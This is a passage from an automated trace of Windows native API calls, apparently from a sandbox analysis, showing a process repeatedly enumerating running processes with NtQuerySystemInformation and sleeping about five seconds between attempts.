Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.773] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.811] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.825] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.854] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.872] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.880] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.888] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.905] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.913] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) 